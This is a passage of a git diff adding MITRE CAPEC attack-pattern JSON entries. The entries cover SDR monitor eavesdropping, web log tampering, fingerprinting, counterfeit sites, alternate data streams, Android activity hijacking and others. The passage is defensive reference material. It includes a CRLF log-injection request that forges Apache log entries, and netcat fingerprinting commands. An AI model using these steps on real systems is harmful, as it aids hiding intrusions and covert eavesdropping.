  1. Survey Target: The adversary surveys the target location, looking for exposed display cables and locations to hide an SDR. This also includes looking for display cables or monitors placed close to a wall, where the SDR can be in range while behind the wall. The adversary also attempts to discover the resolution and refresh rate of the targeted display.

Experiment

  1. Find target using SDR: The adversary sets up an SDR near the target display cable or monitor. They use the SDR software to locate the corresponding frequency of the display cable. This is done by looking for interference peaks that change depending on what the screen is showing. The adversary notes down the possible frequencies of unintentional emission.

    2. Techniques
    An adversary can make use of many different commercially available SDR devices which are easy to setup such as a HackRF, Ubertooth, RTL-SDR, and many others.

Exploit

  1. Visualize Monitor Image: Once the SDR software has been used to identify the target, the adversary will record the transmissions and visualize the monitor image using these transmissions, which allows them to eavesdrop on the information visible on the monitor.

    2. Techniques
    The TempestSDR software can be used in conjunction an SDR device to visualize the monitor image. The adversary will specify the known monitor resolution and refresh rate, or if those are not known they can use the provided auto-correlation graphs to help predict these values. The adversary will then try the different frequencies recorded from the experiment phase, looking for a viewing monitor display. Low pass filters and gain can be manipulated to make the display image clearer.
", + "x_capec_extended_description": "\n This attack gives the adversary the ability to view an external monitor with an insignificant delay. There is also no indicator of compromise from the victim visible on the monitor.\n The eavesdrop is possible due to a signal leakage, that is produced at different points of the connection, including the source port, the connection between the cable and PC, the cable itself, and the connection between the cable and the monitor. That signal leakage can be captured near any of the leak points, but also in a near location, like the next room or a few meters away, using an SDR (Software-defined Radio) device and the correspondent software, that process and interpret the signal to show attackers what the monitor is displaying.\n From the victim’s point of view, this specified attack might cause a high risk, and from the other hand, from the attacker’s point of view, the attack is excellent, since the specified attack method can be used without investing too much effort or require too many skills, as long as the right attack tool is in right place, this allows attackers to completely compromise the confidentiality of the data; also giving the attacker the advantage of being undetectable by not only traditional security products but also from bug sweep because the SDR device is acting in passive mode.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Victim should use an external monitor device", + "Physical access to the target location and devices" + ], + "x_capec_resources_required": [ + "SDR device set with the correspondent antenna", + "Computer with SDR Software" + ], + "x_capec_skills_required": { + "Low": "Understanding of computing hardware, to identify the video cable and video ports", + "Medium": "Knowledge of how to use the SDR and related software: With this knowledge, the adversary will find the correct frequency where the signal is being leaked" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0b08a46d-d680-4f3d-91ad-f97e00878780.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0b08a46d-d680-4f3d-91ad-f97e00878780.json new file mode 100644 index 0000000000000000000000000000000000000000..c6e9a7fab9444c87bad57b402f70bd7cfb7fb9bb --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0b08a46d-d680-4f3d-91ad-f97e00878780.json @@ -0,0 +1,110 @@ +{ + "id": "bundle--5e35451a-bdcf-469a-b35e-217164fc7416", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Web Logs Tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behavior. Additionally, writing malicious data to log files may target jobs, filters, reports, and other agents that process the logs in an asynchronous attack pattern. This pattern of attack is similar to \"Log Injection-Tampering-Forging\" except that in this case, the attack is targeting the logs of the web server and not the application.", + "external_references": [ + { + "external_id": "CAPEC-81", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/81.html" + }, + { + "external_id": "CWE-117", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/117.html" + }, + { + "external_id": "CWE-93", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/93.html" + }, + { + "external_id": "CWE-75", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/75.html" + }, + { + "external_id": "CWE-221", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/221.html" + }, + { + "external_id": "CWE-96", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/96.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-150", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/150.html" + }, + { + "external_id": "CWE-276", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/276.html" + }, + { + "external_id": "CWE-279", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/279.html" + }, + { + "external_id": "CWE-116", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/116.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--0b08a46d-d680-4f3d-91ad-f97e00878780", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Web Server Logs Tampering", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--b3eaa7aa-9601-406c-ae82-0a0e2ea16116" + ], + "x_capec_consequences": { + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Most web servers have a public interface, even if the majority of the site is password protected, there is usually at least a login site and brochureware that is publicly available. HTTP requests to the site are also generally logged to a Web log. From an attacker point of view, standard HTTP requests containing a malicious payload can be sent to the public website (with no other access required), when those requests appear in the log (such as http://victimsite/index.html?< malicious script> if they are followed by an administrator this may be sufficient to probe the administrator's host or local network." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Application Web Server Log File Format: The attacker observes the system and looks for indicators of which logging utility is being used by the web server.

    2. Techniques
    Determine logging utility being used by application web server (e.g. log4j), only possible if the application is known by the attacker or if the application returns error messages with logging utility information.

Experiment

  1. Determine Injectable Content: The attacker launches various logged actions with malicious data to determine what sort of log injection is possible.

    2. Techniques
    Attacker triggers logged actions with maliciously crafted data as inputs, parameters, arguments, etc.

Exploit

  1. Manipulate Log Files: The attacker alters the log contents either directly through manipulation or forging or indirectly through injection of specially crafted request that the web server will receive and write into the logs. This type of attack typically follows another attack and is used to try to cover the traces of the previous attack.

    2. Techniques
    \n Indirectly through injection, use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry.\n For example: The HTTP request for \"/index.html%0A%0DIP_ADDRESS- - DATE_FORMAT] \"GET /forged-path HTTP/1.1\" 200 - \"-\" USER_AGENT\" may add the log line into Apache \"access_log\" (for example). Different applications may require different encodings of the carriage return and line feed characters.\n
    \n Directly through log file or database manipulation, use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry.\n For example: The HTTP request for \"/index.html%0A%0DIP_ADDRESS- - DATE_FORMAT] \"GET /forged-path HTTP/1.1\" 200 - \"-\" USER_AGENT\" may add the log line into Apache \"access_log\" (for example). Different applications may require different encodings of the carriage return and line feed characters.\n
    Directly through log file or database manipulation, modify existing log entries.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Target server software must be a HTTP server that performs web logging." + ], + "x_capec_resources_required": [ + "Ability to send specially formatted HTTP request to web server" + ], + "x_capec_skills_required": { + "Low": "To input faked entries into Web logs" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0cf857f6-afa4-4f0c-850f-58a4f11df157.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0cf857f6-afa4-4f0c-850f-58a4f11df157.json new file mode 100644 index 0000000000000000000000000000000000000000..c13db57a88a11856bc2f8a986647757afb3193dd --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0cf857f6-afa4-4f0c-850f-58a4f11df157.json @@ -0,0 +1,84 @@ +{ + "id": "bundle--2f7ae244-5d8b-45d0-b28a-06555424ecba", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker sends a series of probes to a web application in order to elicit version-dependent and type-dependent behavior that assists in identifying the target. An attacker could learn information such as software versions, error pages, and response headers, variations in implementations of the HTTP protocol, directory structures, and other similar information about the targeted service. This information can then be used by an attacker to formulate a targeted attack plan. While web application fingerprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks.", + "external_references": [ + { + "external_id": "CAPEC-170", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/170.html" + }, + { + "external_id": "CWE-497", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/497.html" + }, + { + "description": "Saumil Shah, An Introduction to HTTP fingerprinting", + "external_id": "REF-36", + "source_name": "reference_from_CAPEC", + "url": "http://www.net-square.com/httprint_paper.html" + }, + { + "description": "OWASP Web Security Testing Guide (v4 [DRAFT]), The Open Web Application Security Project (OWASP)", + "external_id": "REF-37", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/08-Fingerprint_Web_Application_Framework" + }, + { + "description": "HTTP 1.1 Specification (RFC 2616), IETF RFC", + "external_id": "REF-38", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc2616.txt" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-39", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/Fingerprinting" + } + ], + "id": "attack-pattern--0cf857f6-afa4-4f0c-850f-58a4f11df157", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Web Application Fingerprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e7eec058-4cd9-4fa0-8784-ed961d8d7290" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Information Leakage)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An attacker sends malformed requests or requests of nonexistent pages to the server. Consider the following HTTP responses.\n Response from Apache 1.3.23\n $ nc apache.server.com80 GET / HTTP/3.0\n HTTP/1.1 400 Bad RequestDate: Sun, 15 Jun 2003 17:12: 37 GMTServer: Apache/1.3.23Connection: closeTransfer: chunkedContent-Type: text/HTML; charset=iso-8859-1\n Response from IIS 5.0\n $ nc iis.server.com 80GET / HTTP/3.0\n HTTP/1.1 200 OKServer: Microsoft-IIS/5.0Content-Location: http://iis.example.com/Default.htmDate: Fri, 01 Jan 1999 20:14: 02 GMTContent-Type: text/HTMLAccept-Ranges: bytes Last-Modified: Fri, 01 Jan 1999 20:14: 02 GMTETag: W/e0d362a4c335be1: ae1Content-Length: 133\n [REF-37]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Request fingerprinting: Use automated tools or send web server specific commands to web server and wait for server's response.

    2. Techniques
    Use automated tools or send web server specific commands to web server and then receive server's response.

Experiment

  1. Increase the accuracy of server fingerprinting of Web servers: Attacker usually needs to send several different commands to accurately identify the web server. Attacker can also use automated tools to send requests to the server. The responses of the server may be different in terms of protocol behavior.

    2. Techniques
    Observe the ordering of the several HTTP response headers. The ordering of the header of each server may have unique identities.
    Send bad requests or requests of nonexistent pages to the server.
    Attacker takes existing automated tools to recognize the type and the version of the web server in use.

  2. Identify Web Application Software: After the web server platform software has been identified, the attacker start to identify web application technologies such as ASP, .NET, PHP and Java on the server.

    3. Techniques
    Examine the file name extensions in URL, for example .php indicates PHP script interfaced with Apache server.
    Examine the HTTP Response Headers. This may leak information about software signatures
    Examine Cookies that may contain server's software information.
    Check error pages.

  3. Identify Backend Database Version: Determining the database engine type can assist attackers' attempt to successfully execute SQL injection. Some database API such as ODBC will show a database type as part of the driver information when reporting an error.

    4. Techniques
    Use tools to send bogus SQL query to the server and check error pages.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Any web application can be fingerprinted. However, some configuration choices can limit the useful information an attacker may collect during a fingerprinting attack." + ], + "x_capec_resources_required": [ + "While simple fingerprinting can be accomplished with only a web browser, for more thorough fingerprinting an attacker requires a variety of tools to collect information about the target. These tools might include protocol analyzers, web-site crawlers, and fuzzing tools. Footprinting a service adequately may also take a few days if the attacker wishes the footprinting attempt to go undetected." + ], + "x_capec_skills_required": { + "Low": "Attacker knows how to send HTTP request, SQL query to a web application." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067.json new file mode 100644 index 0000000000000000000000000000000000000000..bbdb61b31a48e38326720bd770c00eba1ff60428 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067.json @@ -0,0 +1,55 @@ +{ + "id": "bundle--fdfdc2b9-1600-4cde-b9e8-6a591b35740f", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversary creates duplicates of legitimate websites. When users visit a counterfeit site, the site can gather information or upload malware.", + "external_references": [ + { + "external_id": "CAPEC-543", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/543.html" + }, + { + "description": "Masquerading: Match Legitimate Name or Location", + "external_id": "T1036.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/005" + } + ], + "id": "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Counterfeit Websites", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f", + "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501", + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285" + ], + "x_capec_child_of_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0d2d1e18-6e28-4c58-b442-c5450e6c1112.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0d2d1e18-6e28-4c58-b442-c5450e6c1112.json new file mode 100644 index 0000000000000000000000000000000000000000..2b18ae8f54fba48982522b79da6dacf401fd06ed --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0d2d1e18-6e28-4c58-b442-c5450e6c1112.json @@ -0,0 +1,57 @@ +{ + "id": "bundle--7b20b768-0707-4aa2-b71f-06e623a4cb00", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits the functionality of Microsoft NTFS Alternate Data Streams (ADS) to undermine system security. ADS allows multiple \"files\" to be stored in one directory entry referenced as filename:streamname. One or more alternate data streams may be stored in any file or directory. Normal Microsoft utilities do not show the presence of an ADS stream attached to a file. The additional space for the ADS is not recorded in the displayed file size. The additional space for ADS is accounted for in the used space on the volume. An ADS can be any type of file. ADS are copied by standard Microsoft utilities between NTFS volumes. ADS can be used by an attacker or intruder to hide tools, scripts, and data from detection by normal system utilities. Many anti-virus programs do not check for or scan ADS. Windows Vista does have a switch (-R) on the command line DIR command that will display alternate streams.", + "external_references": [ + { + "external_id": "CAPEC-168", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/168.html" + }, + { + "external_id": "CWE-212", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/212.html" + }, + { + "external_id": "CWE-69", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/69.html" + }, + { + "description": "Windows alternate data stream", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Windows_alternate_data_stream" + } + ], + "id": "attack-pattern--0d2d1e18-6e28-4c58-b442-c5450e6c1112", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Windows ::DATA Alternate Data Stream", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--7f2c0e10-0afe-4edf-bb23-43d6f29ec932" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The target must be running the Microsoft NTFS file system." + ], + "x_capec_resources_required": [ + "The attacker must have command line or programmatic access to the target's files system with write/read permissions." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0e475610-f909-4927-a93c-04f08b1781b3.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0e475610-f909-4927-a93c-04f08b1781b3.json new file mode 100644 index 0000000000000000000000000000000000000000..a157ddc47f5afb37510e5dd4aef1fb8dce4a12b9 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0e475610-f909-4927-a93c-04f08b1781b3.json @@ -0,0 +1,29 @@ +{ + "id": "bundle--9c23af26-b581-44a2-89aa-c1f7f893926d", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-65 : Sniff Application Code\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "external_id": "CAPEC-259", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/259.html" + } + ], + "id": "attack-pattern--0e475610-f909-4927-a93c-04f08b1781b3", + "modified": "2017-08-04T00:00:00.000Z", + "name": "DEPRECATED: Passively Sniffing and Capturing Application Code Bound for an Authorized Client During Patching", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0fda524b-2218-4aec-bf3e-6f345d13e459.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0fda524b-2218-4aec-bf3e-6f345d13e459.json new file mode 100644 index 0000000000000000000000000000000000000000..f3da6ead5497bb7e7c6a2e41520352062ec8c603 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0fda524b-2218-4aec-bf3e-6f345d13e459.json @@ -0,0 +1,46 @@ +{ + "id": "bundle--4d7e6793-b3bc-4a92-96ca-fc95d834d373", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Attacks that reveal the password/passcode pattern on a touchscreen device by detecting oil smudges left behind by the user’s fingers.", + "external_references": [ + { + "external_id": "CAPEC-626", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/626.html" + } + ], + "id": "attack-pattern--0fda524b-2218-4aec-bf3e-6f345d13e459", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Smudge Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_prerequisites": [ + "The attacker must have physical access to the device." + ], + "x_capec_skills_required": { + "Medium": "The attacker must know how to make use of these smudges." + }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1059e91f-43ff-4a00-bc74-4110979f5247.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1059e91f-43ff-4a00-bc74-4110979f5247.json new file mode 100644 index 0000000000000000000000000000000000000000..9900aff56d1a86dbd68d45113d80445d305b1200 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1059e91f-43ff-4a00-bc74-4110979f5247.json @@ -0,0 +1,87 @@ +{ + "id": "bundle--a33feb37-d5fc-4db7-b136-45158b8c7eae", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses a technique to generate an ICMP Error message (Port Unreachable, Destination Unreachable, Redirect, Source Quench, Time Exceeded, Parameter Problem) from a target and then analyze the amount of data returned or \"Quoted\" from the originating request that generated the ICMP error message.", + "external_references": [ + { + "external_id": "CAPEC-329", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/329.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "J. Postel, RFC792 - Internet Control Messaging Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-123", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc792.html" + }, + { + "description": "R. Braden, Ed., RFC1122 - Requirements for Internet Hosts - Communication Layers, 1989--10", + "external_id": "REF-124", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc1122.html" + }, + { + "description": "Ofir Arkin, A Remote Active OS Fingerprinting Tool using ICMP, 2002--04, The Sys-Security Group", + "external_id": "REF-262", + "source_name": "reference_from_CAPEC", + "url": "http://ofirarkin.files.wordpress.com/2008/11/login.pdf" + } + ], + "id": "attack-pattern--1059e91f-43ff-4a00-bc74-4110979f5247", + "modified": "2022-02-22T00:00:00.000Z", + "name": "ICMP Error Message Quoting Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n For this purpose \"Port Unreachable\" error messages are often used, as generating them requires the adversary to send a UDP datagram to a closed port on the target. The goal of this analysis to make inferences about the type of operating system or firmware that sent the error message in reply.\n This is useful for identifying unique characteristics of operating systems because the RFC-1122 expected behavior reads: \"Every ICMP error message includes the Internet header and at least the first 8 data octets of the datagram that triggered the error; more than 8 octets MAY be sent [...].\" This contrasts with RFC-792 expected behavior, which limited the quoted text to 64 bits (8 octets). Given the latitude in the specification the resulting RFC-1122 stack implementations often respond with a high degree of variability in the amount of data quoted in the error message because \"older\" or \"legacy\" stacks may comply with the RFC-792 specification, while other stacks may choose a longer format in accordance with RFC-1122. As a general rule most operating systems or firmware will quote the first 8 bytes of the datagram triggering the error, but some IP stacks will quote more than the first 8 bytes of data.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \"Port Unreachable.." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4.json new file mode 100644 index 0000000000000000000000000000000000000000..9abc029d5b0138f8899d3d8acdca927a160ffdc2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4.json @@ -0,0 +1,64 @@ +{ + "id": "bundle--d630fe85-698a-4959-8ba0-64319c6b597c", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary intercepts an implicit intent sent to launch a Android-based trusted activity and instead launches a counterfeit activity in its place. The malicious activity is then used to mimic the trusted activity's user interface and prompt the target to enter sensitive data as if they were interacting with the trusted activity.", + "external_references": [ + { + "external_id": "CAPEC-501", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/501.html" + }, + { + "external_id": "CWE-923", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/923.html" + }, + { + "description": "Erika Chin, Adrienne Porter Felt, Kate Greenwood, David Wagner, Analyzing Inter-Application Communication in Android, 2011, International Conference on Mobile Systems, Applications, and Services (MobiSys)", + "external_id": "REF-427", + "source_name": "reference_from_CAPEC", + "url": "https://people.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf" + } + ], + "id": "attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Android Activity Hijack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--48f21dcd-2490-49c6-9690-1cb586b201f4", + "attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find an android application that uses implicit intents: Since this attack only works on android applications that use implicit intents, rather than explicit intents, an adversary must first identify an app that uses implicit intents to launch an Android-based trusted activity, and what that activity is.

Experiment

  1. Create a malicious app: The adversary must create a malicious android app meant to intercept implicit intents to launch an Adroid-based trusted activity. This malicious app will mimic the trusted activiy's user interface to get the user to enter sensitive data.

    2. Techniques
    Specify the type of intent wished to be intercepted in the malicious app's manifest file using an intent filter

  2. Get user to download malicious app: The adversary must get a user using the targeted app to download the malicious app by any means necessary

Exploit

  1. Gather sensitive data through malicious app: Once the target application sends an implicit intent to launch a trusted activity, the malicious app will be launched instead that looks identical to the interface of that activity. When the user enters sensitive information it will be captured by the malicious app.

    2. Techniques
    Gather login information from a user using a malicious app
", + "x_capec_prerequisites": [ + "The adversary must have previously installed the malicious application onto the Android device that will run in place of the trusted activity." + ], + "x_capec_resources_required": [ + "Malware capable of acting on the adversary's objectives." + ], + "x_capec_skills_required": { + "High": "The adversary must typically overcome network and host defenses in order to place malware on the system." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--11d7e0d6-5655-4fc7-aee8-e2e0fc6c5088.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--11d7e0d6-5655-4fc7-aee8-e2e0fc6c5088.json new file mode 100644 index 0000000000000000000000000000000000000000..0dad861ad2f998d2a6b5e324991bdda6931de82e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--11d7e0d6-5655-4fc7-aee8-e2e0fc6c5088.json @@ -0,0 +1,53 @@ +{ + "id": "bundle--0a006e5e-ce77-4270-a01c-eafbfe068116", + "objects": 